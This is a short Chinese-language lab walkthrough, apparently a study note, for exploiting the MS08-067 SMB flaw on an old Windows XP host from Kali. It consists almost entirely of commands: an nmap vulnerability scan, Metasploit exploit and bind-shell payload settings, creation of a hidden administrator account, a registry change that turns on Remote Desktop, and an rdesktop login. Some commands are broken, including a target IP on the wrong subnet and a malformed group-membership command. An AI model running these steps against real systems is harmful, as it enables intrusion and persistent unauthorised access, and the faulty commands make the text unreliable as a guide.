影響範圍:
Windows 2000
Windows XP
Windows Server 2003
復現環境
win xp :192.168.31.49
kali :192.168.31.117
復現:
nmap掃描漏洞是否存在:
nmap -n -p 445 --script smb-vuln-ms08-067 192.168.31.49 --open
打開metasploite,找到ms08-067模塊進入:
root@kali:~# msfconsole
msf5 > search ms08-067
msf5 > use exploit/windows/smb/ms08_067_netapi
目標ip:set RHOST 192.168.44.49
端口:set RPORT 445
payload:set payload generic/shell_bind_tcp
攻擊機ip,類型,配置信息 開始:
set LHOST 192.168.31.117
set target 0
show options
exploit
創建一個管理員用戶:
net user h 123 /add
net user localgroup administratos h /add
開啓3389端口:
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
使用h用戶連接登錄
rdesktop 192.168.31.49
參考連接:
https://blog.csdn.net/Eastmount/article/details/104834931
https://blog.csdn.net/s0mor/article/details/98937473